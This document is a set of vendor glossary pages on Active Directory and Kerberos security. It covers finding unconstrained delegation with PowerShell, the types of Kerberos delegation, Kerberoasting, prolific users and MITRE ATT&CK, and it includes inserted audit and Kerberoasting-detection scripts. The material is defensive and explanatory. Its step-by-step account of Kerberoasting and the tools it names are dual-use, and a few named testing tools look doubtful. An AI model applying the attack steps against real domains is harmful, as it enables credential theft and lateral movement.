PowerShell is a powerful tool for managing and querying Active Directory environments. You can use it to find accounts with Unconstrained Delegation enabled by executing a simple script.

1. Open PowerShell with Administrative Privileges: Launch PowerShell as an administrator to ensure you have the necessary permissions to query AD.
2. Import the Active Directory Module: If it is not already loaded by default, you may need to import the Active Directory module with the command:

   ```powershell
   Import-Module ActiveDirectory
   ```

3. Execute a Query to Find Unconstrained Delegation: Use the Get-ADUser and Get-ADComputer cmdlets to search for user and computer accounts where the TrustedForDelegation property is True. This property being True indicates that Unconstrained Delegation is enabled.
   Here's how you can structure the command:

   ```powershell
   Get-ADUser -Filter 'TrustedForDelegation -eq $true' -Properties TrustedForDelegation |
       Select-Object Name, DistinguishedName, TrustedForDelegation
   ```

   And for computer accounts:

   ```powershell
   Get-ADComputer -Filter 'TrustedForDelegation -eq $true' -Properties TrustedForDelegation |
       Select-Object Name, DistinguishedName, TrustedForDelegation
   ```

4. Review the Output: The commands list the AD users and computers that have Unconstrained Delegation enabled. Pay close attention to these accounts, as they possess significant permissions that could be exploited if compromised.

### Using Active Directory Users and Computers (ADUC)

For those who prefer a graphical user interface (GUI), the Active Directory Users and Computers (ADUC) tool can be used:

1. Open ADUC: Ensure you have the necessary administrative privileges to access and modify AD objects.
2. Enable Advanced Features: Go to the "View" menu and ensure that "Advanced Features" is checked. This option reveals additional properties for AD objects.
3. Search for Accounts with Unconstrained Delegation: Navigate through your AD structure and inspect the properties of user and computer accounts. Under the "Delegation" tab, accounts with Unconstrained Delegation will have "Trust this user for delegation to any service (Kerberos only)" selected.
4. Document and Review: Keep a record of all accounts with Unconstrained Delegation enabled for further review and possible action.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/kerberos-delegation/

A Kerberos mechanism that allows services to act on behalf of authenticated users to access other services, with variants—unconstrained, constrained, and resource-based—offering differing levels of security control.

Kerberos delegation allows a service to request resources or perform actions on behalf of a user, while maintaining the security principles of authentication and authorization.
Delegation within Kerberos plays a pivotal role in facilitating secure, seamless interactions between services on behalf of users. Kerberos, a cornerstone of modern network security architectures, offers a robust framework for authenticating users and services over a non-secure network. It eliminates the need to transmit passwords directly, instead using cryptographic tickets to prove identity. However, in complex IT environments, situations frequently arise where a service must act on behalf of a user to access other services. This requirement led to the development of Kerberos delegation. This capability is vital in scenarios where user-initiated processes involve multiple tiers of services, each requiring authentication.

The concept might seem straightforward, yet its implementation and the security considerations it entails are complex and nuanced. It is essential for IT and cybersecurity professionals to understand the mechanics, applications, and risks associated with Kerberos delegation to effectively secure their environments.

## How Kerberos Delegation Works

The Kerberos protocol was originally designed for a simpler networked environment, with the goal of authenticating users to services that could be accessed directly. The need for services to communicate on behalf of users became apparent as IT infrastructures evolved into more layered and integrated architectures. To accommodate this change, Kerberos gained delegation, allowing for more complex interactions while maintaining its security assurances.

The delegation process in Kerberos involves several key steps:

1. The user authenticates to the Kerberos Key Distribution Center (KDC) and receives a Ticket-Granting Ticket (TGT).
2. When accessing a service that requires delegation, the service requests a service ticket from the KDC on behalf of the user, indicating the need to access another service downstream.
3. The KDC issues a service ticket that the initial service can use to request access to the downstream service on behalf of the user.

This mechanism ensures that user credentials are never exposed to services, adhering to Kerberos' security principles.

## Types of Kerberos Delegation

To address varying levels of security needs and application architectures, three different types of Kerberos delegation have been developed. These types—unconstrained, constrained, and resource-based constrained delegation—each offer different mechanisms for services to act on behalf of users, with specific controls over which services can be accessed.

### Unconstrained Delegation

This is the most permissive form of delegation within Kerberos, allowing a service to request access to any other service on behalf of the user. With unconstrained delegation, once a user authenticates to a service, that service can obtain tickets to any other service for the user. This form of delegation is powerful but poses significant security risks if not carefully managed, as it essentially grants the service wide-ranging powers to act on behalf of the user.

### Constrained Delegation

Introduced to mitigate the risks associated with unconstrained delegation, constrained delegation limits the services to which a delegate can request access on behalf of the user. It requires specifying in advance which services are allowed for delegation, providing a controlled and secure environment for delegation to occur. This setup relies on the Service for User to Proxy (S4U2Proxy) extension, which enables a service to obtain a ticket to a specific service on behalf of the user, but only if that service is explicitly allowed.

### Resource-Based Constrained Delegation

An evolution of constrained delegation, resource-based constrained delegation further enhances security and flexibility by allowing the target service's administrator to control which services can delegate to it.
Introduced in Windows Server 2012, this type shifts the delegation configuration from the domain controller to the resource itself. It leverages the Service for User to Self (S4U2Self) and S4U2Proxy extensions to allow a service to request access on behalf of the user based on permissions defined at the resource level, not globally across the domain. Each type of delegation addresses specific security concerns and operational needs: Unconstrained Delegation is suitable for highly trusted environments where ease of use trumps the potential for abuse. Constrained Delegation provides a balanced approach, offering flexibility while significantly limiting the potential for misuse by restricting delegation to specified services. Resource-Based Constrained Delegation offers the highest level of control and security, allowing resource owners to directly manage which services can act on their behalf, thereby minimizing the risk of unauthorized delegation. Security Considerations and Risks Security considerations and risks are paramount in the complex world of Kerberos delegation. Each type of delegation—unconstrained, constrained, and resource-based constrained—carries specific vulnerabilities that could potentially be exploited if not properly managed. Understanding these risks and the measures to mitigate them is essential for maintaining the integrity and security of an IT environment. Unconstrained Delegation Risks The most significant risk with unconstrained delegation is the possibility of a compromised service account being used to access any other service within the network on behalf of users. This could lead to privilege escalation and lateral movement within the network if attackers gain control of such an account. Mitigation strategies include limiting the use of unconstrained delegation to highly trusted services, using more secure forms of delegation where possible, and employing strict monitoring and auditing to detect unusual activity. 
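The review that the mitigation above calls for can be scripted. As an added example (not code from Silverfort or this page), the block below classifies accounts exported from Active Directory by the TRUSTED_FOR_DELEGATION and TRUSTED_TO_AUTH_FOR_DELEGATION bits of userAccountControl and by the msDS-AllowedToDelegateTo and msDS-AllowedToActOnBehalfOfOtherIdentity attributes described in the Configuration and Management section of this entry, then flags the settings a reviewer should look at first. The account records, the sensitive-SPN list and the already-resolved RBCD principals are constructed assumptions.

```python
"""Audit Kerberos delegation settings on accounts exported from Active Directory.

Added example for this entry (not Silverfort's code). It classifies each account
as unconstrained, constrained (with or without protocol transition), or an RBCD
target, and reports the configurations a reviewer should look at first. The
account records below are constructed for the example, not taken from any
environment.
"""
from dataclasses import dataclass, field

# userAccountControl bits (ADS_USER_FLAG_ENUM values from Microsoft).
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self)

# SPN service classes treated as sensitive here (assumption: tune per environment).
SENSITIVE_SPN_PREFIXES = ("ldap/", "cifs/", "mssqlsvc/")


@dataclass
class Account:
    name: str
    user_account_control: int
    # msDS-AllowedToDelegateTo: SPNs this account may delegate to (constrained).
    allowed_to_delegate_to: list = field(default_factory=list)
    # Principals granted by msDS-AllowedToActOnBehalfOfOtherIdentity on this
    # object (RBCD). In AD that attribute is a security descriptor; the example
    # assumes it has already been resolved to account names.
    allowed_to_act_on_behalf: list = field(default_factory=list)


def delegation_type(acct: Account) -> str:
    """Return the delegation class implied by the account's flags and attributes."""
    uac = acct.user_account_control
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.allowed_to_delegate_to:
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained+protocol-transition"
        return "constrained"
    if acct.allowed_to_act_on_behalf:
        return "rbcd-target"
    return "none"


def audit(accounts):
    """Return (account, severity, reason) findings worth a reviewer's attention."""
    findings = []
    for acct in accounts:
        kind = delegation_type(acct)
        is_dc = bool(acct.user_account_control & SERVER_TRUST_ACCOUNT)
        # Domain controllers carry TRUSTED_FOR_DELEGATION by default; any other
        # account with unconstrained delegation is a high-value target if compromised.
        if kind == "unconstrained" and not is_dc:
            findings.append((acct.name, "HIGH", "unconstrained delegation on a non-DC account"))
        elif kind == "constrained+protocol-transition":
            findings.append((acct.name, "HIGH",
                             "protocol transition: tickets obtainable without the user authenticating"))
        if kind.startswith("constrained"):
            for spn in acct.allowed_to_delegate_to:
                if spn.lower().startswith(SENSITIVE_SPN_PREFIXES):
                    findings.append((acct.name, "MEDIUM", f"may delegate to sensitive service {spn}"))
        if kind == "rbcd-target":
            findings.append((acct.name, "INFO",
                             "RBCD permits delegation from: " + ", ".join(acct.allowed_to_act_on_behalf)))
    return findings


# Constructed sample export; names and SPNs are placeholders.
SAMPLE_ACCOUNTS = [
    Account("DC01$", SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
    Account("WEB01$", WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION),
    Account("svc-report", NORMAL_ACCOUNT, ["MSSQLSvc/sql01.corp.example:1433"]),
    Account("svc-portal", NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
            ["cifs/fs01.corp.example"]),
    Account("APP02$", WORKSTATION_TRUST_ACCOUNT, allowed_to_act_on_behalf=["WEB02$"]),
    Account("jdoe", NORMAL_ACCOUNT),
]

if __name__ == "__main__":
    for name, severity, reason in audit(SAMPLE_ACCOUNTS):
        print(f"{severity:6} {name:12} {reason}")
```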
#### Constrained Delegation Risks

While constrained delegation limits the scope of services that a delegated account can access, misconfigurations or overly permissive settings can still present opportunities for attackers. For example, if a service account is allowed to delegate to sensitive services and that account is compromised, the impact could be substantial. Mitigating these risks involves regularly reviewing the services allowed in the msDS-AllowedToDelegateTo attribute and ensuring that only necessary services are permitted.

#### Resource-Based Constrained Delegation Risks

The decentralization of delegation authority to resource owners increases flexibility but also introduces the risk of inconsistent security policies or configurations across different resources. If a resource owner inadvertently allows delegation from an insecure service, it could compromise the resource. To mitigate these risks, organizations should establish clear policies for configuring resource-based constrained delegation, provide training for resource owners, and conduct regular audits to ensure compliance with security best practices.

### How to Identify if Kerberos Is Being Used

There are a few methods you can use to identify the presence of Kerberos:

- Check the system logs. On Linux systems, Kerberos authentication events are usually logged in /var/log/messages or /var/log/syslog. On Windows systems, they are usually located in the Event Viewer under the "Security" category. Look for errors or warnings related to Kerberos. Common error messages include "KDC_ERR_SERVER_NOT_FOUND", "KDC_ERR_CLIENT_NOT_TRUSTED", "KDC_ERR_INVALID_CREDENTIAL", "KRB5KDC_ERR_ETYPE_NOSUPP", and "KRB5KDC_ERR_PREAUTH_FAILED".
- Look for Kerberos configuration files. On Linux systems, the Kerberos configuration file is typically /etc/krb5.conf. On Windows systems, it is usually %WINDIR%\krb5.ini. Check the configuration files for errors or inconsistencies. Make sure that the Kerberos realm is correct and that the KDC servers are listed correctly.
- Check the registry. On Windows systems, the Kerberos configuration is also stored in the registry; the relevant key is HKLM\SYSTEM\CurrentControlSet\Services\Kdc. Check the key for errors or inconsistencies, and make sure that the Kerberos realm is correct and that the KDC servers are listed correctly.
- Use a network sniffer. A network sniffer can capture Kerberos authentication traffic, which is useful for troubleshooting Kerberos problems or for monitoring Kerberos activity. Look for errors or anomalies in the Kerberos traffic.
- Use a Kerberos testing tool. A number of Kerberos testing tools can be used to test the Kerberos configuration and authentication process, including kinit, klist, kdcdiag, krb5-test-client, and krb5-test-server. Use them to test the configuration and authentication process and look for errors or inconsistencies in the results.

### Configuration and Management

Configuring and managing Kerberos delegation is a critical step in ensuring that it serves its intended purpose without compromising security. Each type of delegation—unconstrained, constrained, and resource-based constrained—requires specific configuration steps, involving both the Active Directory environment and individual service settings.

- Unconstrained Delegation: Enable it on a service account by setting the TRUSTED_FOR_DELEGATION flag in the account's Active Directory properties. No restrictions are placed on the services to which the delegate can request tickets on behalf of the user, so accounts must be selected for this delegation type with great care to avoid security risks.
- Constrained Delegation (S4U2Proxy): Configure it by specifying the services to which a particular service account can present delegated credentials. This is done by modifying the msDS-AllowedToDelegateTo attribute of the service account's Active Directory object. If protocol transition (S4U2Self) will also be used, allowing the service to request tickets on behalf of users without an initial Kerberos authentication, the TRUSTED_TO_AUTH_FOR_DELEGATION flag must also be set on the service account.
- Resource-Based Constrained Delegation: Configure it by setting permissions on the target service's Active Directory object, specifically in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This allows the resource owner to control directly which services can delegate to it. Unlike traditional constrained delegation, resource-based constrained delegation does not require changes on the delegating service account, simplifying management and increasing flexibility.

### Conclusion

Kerberos delegation offers a robust framework that allows users to navigate the complex security demands of modern networked environments. Through delegation, Kerberos has evolved as a solution to authenticate users across non-secure networks. Even though this capability is powerful, it requires a comprehensive understanding and meticulous management if it is to be harnessed effectively while mitigating the inherent security risks.

In all forms of Kerberos delegation, security considerations are of the utmost importance. Due to the potential for abuse or misconfiguration, vigilant management, regular auditing, and the principle of least privilege are required. By understanding the specific risks associated with each delegation type and employing best practices, organizations can significantly reduce vulnerabilities.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/kerberoasting/

A stealthy AD attack where adversaries request Kerberos Ticket Granting Service (TGS) tickets for service accounts, then crack them offline to reveal service account credentials.
Kerberoasting is a sophisticated attack method that exploits the Kerberos authentication protocol integral to Active Directory (AD). Kerberos is designed to facilitate secure authentication over potentially insecure networks, yet it becomes an unwitting accomplice in these attacks, providing a backdoor through which attackers can gain unauthorized access to sensitive systems and data.

Kerberoasting specifically targets service accounts within an AD environment, exploiting the fact that any authenticated user can request Ticket Granting Service (TGS) tickets for any service. Attackers leverage this functionality to request TGS tickets associated with Service Principal Names (SPNs), then work offline to crack the encrypted tickets and extract service account passwords. This technique allows attackers to bypass network defenses and gain access to restricted areas undetected.

The threat posed by Kerberoasting is significant due to its stealthy nature and the potential for high-impact breaches. Organizations leveraging AD for network authentication and authorization must be aware of this threat vector to implement effective defenses. Understanding Kerberoasting — its mechanisms, implications, and prevention strategies — is crucial for cybersecurity and IT professionals tasked with defending their organizations' digital assets.

### How Kerberoasting Works

Kerberoasting exploits the Kerberos authentication protocol, a core part of Active Directory (AD) used for authenticating users and services in a network. Understanding this attack requires a foundational grasp of Kerberos itself, which operates on a ticket-based mechanism to secure communications across a network.

#### The Kerberos Authentication Protocol

At the heart of Kerberos is the Ticket Granting Ticket (TGT), obtained upon a user's successful login. The TGT is then used to request Ticket Granting Service (TGS) tickets for accessing various network services. These services are identified by their Service Principal Names (SPNs). It is a system designed for security, but its architecture inadvertently opens a door for exploitation.

#### The Attack Vector

Kerberoasting takes advantage of the fact that any authenticated user within a domain can request TGS tickets for any service defined under an SPN. By posing as a legitimate user, an attacker requests TGS tickets for services, which are encrypted using the password of the service account. The attack relies on the attacker's ability to take these encrypted tickets offline and attempt to crack them in order to reveal the password of the service account. This process involves the following steps:

1. Scanning for Service Accounts: Attackers scan the AD for user accounts with associated SPNs, which indicate service accounts.
2. Requesting TGS Tickets: Using a legitimate user's credentials, attackers request TGS tickets from the AD domain controller for those identified service accounts.
3. Extracting and Cracking the Tickets: The attacker then extracts the encrypted part of the TGS tickets and uses offline brute force or password cracking tools to discover the service account's password.

#### Why It's Effective

Kerberoasting is particularly effective because it can be conducted with standard user privileges and without triggering alerts that might be associated with other forms of attack, such as direct password brute force attempts against the network. Moreover, the offline nature of the password cracking effort evades the detection mechanisms that networks typically employ to identify suspicious activities, such as multiple failed login attempts. This attack underscores a critical vulnerability in the Kerberos protocol's implementation within Windows AD environments — the reliance on the secrecy and strength of service account passwords. Given the silent and stealthy nature of Kerberoasting, it poses a significant threat to organizations, enabling attackers to gain access to sensitive services and data.

### The Threat Landscape

In organizational networks, Kerberoasting attacks are common and successful, illustrating a critical vulnerability in cybersecurity. As attackers refine their methodologies, Kerberoasting remains an attractive exploit due to its combination of stealth and effectiveness. It is vital to understand how this threat operates in order to devise defenses that can withstand its complexity.

#### Prevalence of Kerberoasting Attacks

Kerberoasting has become a common attack method, partly due to the ubiquity of Windows Active Directory (AD) in corporate environments and the relative simplicity of executing the attack. Tools like PowerSploit's Invoke-Kerberoast module or Rubeus make these attacks accessible even to less technically sophisticated attackers. Real-world incidents, including notable breaches attributed to state-sponsored actors and criminal groups, highlight the ongoing threat posed by Kerberoasting.

#### Factors Contributing to Kerberoasting's Success

- Weak Password Policies: Service accounts often have weak or default passwords that are rarely changed, making them prime targets for Kerberoasting.
- Lack of Visibility and Monitoring: Many organizations lack the visibility into their AD environment needed to detect the early signs of a Kerberoasting attack.
- Misconfiguration and Overprivileged Accounts: Improperly configured service accounts and those with unnecessary privileges expand the attack surface for Kerberoasting.
- Stealthiness: Kerberoasting attacks are difficult to detect because they don't require elevated privileges and can be performed without triggering multiple failed authentication attempts, which are commonly monitored for.
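The visibility gap described above can be narrowed with a simple detection. The block below, added here as an example and not Silverfort's code, replays constructed Windows Security Event ID 4769 ("A Kerberos service ticket was requested") records and alerts when one account from one host requests an unusually large number of distinct service-account tickets within a short window, the pattern the detection techniques later in this entry describe; it also counts how many of those requests asked for RC4 tickets, which are cheaper to crack offline than AES ones. The threshold, the window and the assumption that AES is the environment's normal encryption type are tunables, not values from this page.

```python
"""Flag Kerberoasting-like bursts of TGS requests in Windows Security event data.

Added example for this entry (not Silverfort's code). Input records carry the
fields of Event ID 4769 ("A Kerberos service ticket was requested"); the sample
events are constructed. Two indicators are combined: many distinct service
accounts requested by one account from one host inside a short window, and
RC4 ticket encryption (assumption: the environment normally issues AES tickets).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                  # TicketEncryptionType for RC4; AES128/AES256 are 0x11/0x12
WINDOW = timedelta(minutes=5)
DISTINCT_SERVICE_THRESHOLD = 5   # assumption: tune to the environment's baseline


def parse_event(line: str) -> dict:
    """Parse one flattened 'Key=Value ...' 4769 record into typed fields."""
    ev = dict(part.split("=", 1) for part in line.split())
    ev["TimeCreated"] = datetime.fromisoformat(ev["TimeCreated"])
    ev["TicketEncryptionType"] = int(ev["TicketEncryptionType"], 16)
    return ev


def is_roastable(service_name: str) -> bool:
    """Only user accounts with SPNs matter: computer accounts (trailing $) have
    long random passwords and krbtgt requests are TGT operations, so both are ignored."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect(lines, threshold=DISTINCT_SERVICE_THRESHOLD, window=WINDOW):
    """Return one alert per (requesting account, source IP) that requests
    `threshold` or more distinct roastable services within `window`."""
    events = sorted((parse_event(ln) for ln in lines if ln.strip()),
                    key=lambda e: e["TimeCreated"])
    recent = defaultdict(list)      # (account, ip) -> [(time, service, etype)]
    alerts, alerted = [], set()
    for ev in events:
        if not is_roastable(ev["ServiceName"]):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        hist = recent[key]
        hist.append((ev["TimeCreated"], ev["ServiceName"], ev["TicketEncryptionType"]))
        cutoff = ev["TimeCreated"] - window
        hist[:] = [h for h in hist if h[0] >= cutoff]   # drop events outside the window
        services = {h[1] for h in hist}
        if len(services) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "account": key[0],
                "source_ip": key[1],
                "distinct_services": len(services),
                "rc4_requests": sum(1 for h in hist if h[2] == RC4_HMAC),
                "first_seen": hist[0][0].isoformat(),
                "last_seen": hist[-1][0].isoformat(),
            })
    return alerts


# Constructed sample: jdoe is normal activity; asmith enumerates service accounts.
SAMPLE_4769 = """\
TimeCreated=2024-05-21T09:00:01 TargetUserName=jdoe@CORP.EXAMPLE ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=10.1.1.20
TimeCreated=2024-05-21T09:00:05 TargetUserName=jdoe@CORP.EXAMPLE ServiceName=svc-sql TicketEncryptionType=0x12 IpAddress=10.1.1.20
TimeCreated=2024-05-21T09:45:00 TargetUserName=jdoe@CORP.EXAMPLE ServiceName=svc-web TicketEncryptionType=0x12 IpAddress=10.1.1.20
TimeCreated=2024-05-21T10:15:00 TargetUserName=asmith@CORP.EXAMPLE ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:01 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:01 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-web TicketEncryptionType=0x17 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:02 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:02 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-report TicketEncryptionType=0x17 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:03 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-crm TicketEncryptionType=0x17 IpAddress=10.1.1.77
TimeCreated=2024-05-21T10:15:03 TargetUserName=asmith@CORP.EXAMPLE ServiceName=svc-sharepoint TicketEncryptionType=0x17 IpAddress=10.1.1.77
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_4769.splitlines()):
        print(alert)
```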
### Examples of Kerberoasting Attacks

Kerberoasting attacks have been part of some of the most sophisticated cyber attacks observed in recent years, demonstrating the high stakes involved when organizations fail to secure their Active Directory (AD) environments adequately.

#### Operation Wocao

In one notable example, the threat actors behind Operation Wocao used the PowerSploit framework's Invoke-Kerberoast module to perform Kerberoasting attacks. This operation showcased the attackers' ability to request encrypted service tickets and subsequently crack the passwords of Windows service accounts offline. The breached accounts were then used for lateral movement within networks, enabling further exploitation and access to sensitive information. This incident underlines the effectiveness of Kerberoasting in advanced persistent threat (APT) campaigns, highlighting the importance of securing service accounts against such attacks (MITRE ATT&CK).

#### SolarWinds Compromise

Another significant case involved the SolarWinds breach, where attackers leveraged Kerberoasting among other techniques to gain access to networks. In this instance, attackers obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names (SPNs) and cracked them offline to escalate their access privileges. This compromise highlighted not only the vulnerability of service accounts to Kerberoasting but also the potential for wide-reaching implications, as the breach impacted numerous high-profile organizations and government agencies (MITRE ATT&CK).

#### Wizard Spider's Use of Kerberoasting

The criminal group known as Wizard Spider has been reported to use Kerberoasting as part of its arsenal. The group employed tools like Rubeus and Mimikatz to steal AES hashes and service account credentials through Kerberoasting. This technique allowed it to maintain access and control over compromised networks, facilitating the deployment of ransomware and other malicious payloads. The activities of Wizard Spider exemplify the criminal exploitation of Kerberoasting, underscoring the risk to organizations across sectors (MITRE ATT&CK).

These examples of Kerberoasting attacks illustrate the critical need for organizations to actively monitor and secure their AD environments. The sophistication and diversity of attackers leveraging this technique—from state-sponsored APT groups to criminal collectives—underscore the importance of robust security measures, including strong password policies, regular auditing of service accounts, and the implementation of detection mechanisms to identify suspicious activities indicative of Kerberoasting attempts.

### Detecting and Preventing Kerberoasting

Detecting and preventing Kerberoasting, which exploits legitimate features of the Kerberos authentication protocol for malicious purposes, requires a multifaceted approach. Organizations can significantly reduce their exposure to Kerberoasting through strategic planning, robust security protocols, and continuous monitoring.

#### Best Practices for Prevention

- Leverage Identity-Based Zero Trust Security Policies: By implementing a Zero Trust security model, you ensure that no entity within the network is trusted by default, regardless of its location within the perimeter. This principle applies to both human users and service accounts; by requiring verification at every access attempt, you reduce the attack surface available to adversaries, including those attempting Kerberoasting.
- Implement Strong Password Policies: Enforce complex, lengthy (ideally 25+ characters), and regularly changed passwords for all accounts, especially service accounts with Service Principal Names (SPNs). Tools like password managers and Group Managed Service Accounts (gMSAs) can help maintain strong password hygiene without sacrificing operational efficiency.
- Enable Multi-Factor Authentication (MFA): Adding an extra layer of security through MFA can significantly reduce the risk of unauthorized access, even if service account credentials are compromised. MFA should be standard for all user accounts, not just those with elevated privileges.
- Adhere to the Principle of Least Privilege (PoLP): Ensure that accounts, especially service accounts, have only the permissions necessary for their functions. Limiting access rights minimizes the potential damage an attacker can do after compromising an account.
- Develop a Comprehensive Identity Security Strategy: A robust identity and access management framework can safeguard against various threats, including Kerberoasting. This strategy should include regular audits of service accounts, privileged access management (PAM), and the adoption of security solutions that provide visibility into and control over account use.

#### Techniques for Detecting Kerberoasting

- Monitor for Anomalous Kerberos Activity: Implement logging and monitoring to detect unusual patterns of Kerberos authentication requests, such as a high volume of TGS requests for SPNs within a short time frame.
- Audit Service Account Usage: Regularly review service account activity for signs of unauthorized use, such as accessing services or data outside of normal patterns. This review can help identify compromised accounts before they are used for lateral movement or data exfiltration.
- Leverage Advanced Security Analytics: Machine learning and behavior analysis can help identify subtle signs of Kerberoasting, distinguishing between legitimate service account use and potentially malicious activity.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/prolific-user/

A user who frequently accesses multiple systems or performs numerous actions, often generating high volumes of identity activity that may require monitoring for anomalies.
Prolific users are standard user accounts, as defined by all AD parameters, that have access privileges to an exceedingly high number of machines. Prolific users are not subject to the same monitoring and protection measures placed over admin users. Technically, they are not even admins, since they are not included in any administrative user group. This makes them a highly attractive target for compromise: compromising one yields a similar result to compromising an admin account, and it is less likely to be protected. Once compromised, attackers gain a direct route into the same resources as these prolific user accounts, facilitating a rapid and efficient lateral movement process.

There is no straightforward way to know in advance whether a user account is prolific. However, given their relatively large number, attackers stand a good chance of finding one simply by trying to use a standard compromised account to move laterally.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/mitre-attack-framework/

A globally recognized knowledge base of adversarial tactics, techniques, and procedures used to simulate, understand, and defend against cybersecurity threats.

The MITRE ATT&CK Framework has emerged as a model for cybersecurity and IT professionals, offering a comprehensive matrix that categorizes and describes specific tactics, techniques, and procedures (TTPs) used by threat actors in their cyber operations. This framework was created to provide a granular understanding of adversary behaviors and enable organizations to better understand the adversary's actions and prepare more effective defenses against them.

The significance of the MITRE ATT&CK Framework in cybersecurity cannot be overstated. For IT professionals, it serves as a valuable reference that aids in the identification, prevention, and mitigation of cyber threats.
By offering a detailed understanding of how adversaries operate, the framework empowers defenders to adopt a more proactive stance in their cybersecurity measures. This, in turn, enhances their ability to protect critical infrastructure and sensitive data against increasingly sophisticated attacks.

### The MITRE ATT&CK Matrix: Understanding the Framework's Structure

At the core of the MITRE ATT&CK Framework is its detailed matrix of tactics, techniques, and procedures (TTPs), a structured categorization that provides a granular understanding of adversary behaviors. This section explains the framework's structure, offering insights into how its components interlink to offer a comprehensive picture of cyber threats.

#### Tactics

Tactics represent the "why" of an adversary's actions—their objectives during an attack. Each tactic within the framework corresponds to a specific goal that the adversary aims to achieve, such as gaining initial access, executing commands, or exfiltrating data. Understanding these tactics allows cybersecurity professionals to anticipate what an attacker might do next, informing strategic defensive measures.

The MITRE ATT&CK Framework organizes these objectives into a series of categories, each representing a stage in the attack lifecycle. From initial access and execution to privilege escalation and exfiltration, tactics offer a lens through which to view the adversary's intentions. Recognizing these objectives is pivotal for defenders, as it guides the development of targeted defensive strategies to thwart the attackers' plans.

- Reconnaissance: The collection of information used to plan future attacks. This includes gathering data on the target's personnel, infrastructure, and digital presence to identify vulnerabilities and plan entry points.
- Resource Development: The creation and management of resources used in attacks, such as acquiring domain names, developing malware, and establishing infrastructure for operations.
- Initial Access: The methods attackers use to gain an entry point into a network. Techniques under this tactic include phishing, exploiting public-facing applications, and using valid accounts.
- Execution: The execution of code to carry out actions on the target system, such as running malicious scripts or exploiting vulnerabilities to execute arbitrary code.
- Persistence: The techniques used by attackers to maintain their foothold within a network across reboots, changed credentials, and other interruptions that could cut off their access.
- Privilege Escalation: Methods used to gain higher-level permissions on a system or network. Common techniques include exploiting system vulnerabilities and manipulating access tokens.
- Defense Evasion: Techniques designed to avoid detection by security measures, such as obfuscating malicious code, disabling security software, and using encryption to hide command and control traffic.
- Credential Access: The strategies used to steal account names and passwords, including credential dumping, input capture, and exploiting system or service vulnerabilities.
- Discovery: The actions taken to gain knowledge about the system and internal network. Attackers may catalog software installations, understand security policies, and enumerate system and network resources.
- Lateral Movement: Techniques that enable an attacker to move through a network, gaining access to and control of additional systems, often using stolen credentials.
- Collection: The gathering of data of interest to the attacker's objectives. This may involve capturing screenshots, keylogging, or collecting data stored in the cloud.
- Command and Control (C2): The mechanisms used to maintain communication with the compromised system, allowing the attacker to control the system remotely, exfiltrate data, and deploy additional tools.
- Exfiltration: The methods used to steal data from the target network. Techniques can include transferring data over the command and control channel, using a web service, or physical means.
- Impact: The tactics aimed at disrupting, destroying, or manipulating information and systems to affect the target's operations. This includes data destruction, defacement, and denial of service attacks.

#### Techniques

Techniques describe "how" the adversaries achieve their objectives. For each tactic, the framework lists various techniques that adversaries might employ. For instance, under the tactic of "Initial Access," techniques could include spear-phishing emails or exploiting public-facing applications. By cataloging these techniques, the framework offers a playbook of potential attack methods, enabling defenders to tailor their defenses to the most likely threats.

For each tactic, there are multiple techniques that an adversary might employ, reflecting the diverse array of tools and methods at their disposal. Understanding these techniques is critical for cybersecurity professionals, as it enables them to identify potential attack vectors and implement appropriate safeguards.

The MITRE ATT&CK Framework catalogs a vast array of techniques that adversaries use to achieve their objectives throughout the attack lifecycle. While the relevance of specific techniques varies with the context, environment, and targets, several are frequently observed across a wide range of incidents. Below, we outline some of the most common techniques detailed in the framework, emphasizing their widespread application and the critical need for defenses against them.

- Phishing (T1566): Using fraudulent communications, often email, to deceive users into providing sensitive information or executing malicious payloads.
- Drive-by Compromise (T1189): Exploiting vulnerabilities in web browsers to execute code simply by visiting a compromised website.
- Command and Scripting Interpreter (T1059): Employing scripts or commands to execute actions. PowerShell (T1059.001) is particularly prevalent due to its powerful capabilities and deep integration with Windows environments.
- User Execution (T1204): Tricking users into running malicious code, for example by opening a malicious attachment or link.
- Registry Run Keys / Startup Folder (T1547.001): Adding programs to registry keys or startup folders to execute malware automatically upon system startup.
- Account Manipulation (T1098): Modifying user accounts to maintain access, such as adding credentials to a domain account.
- Exploitation for Privilege Escalation (T1068): Taking advantage of software vulnerabilities to gain higher-level privileges.
- Valid Accounts (T1078): Using legitimate credentials to gain access, often leading to elevated privileges if the credentials belong to a user with more access.
- Obfuscated Files or Information (T1027): Concealing malicious code within files to evade detection.
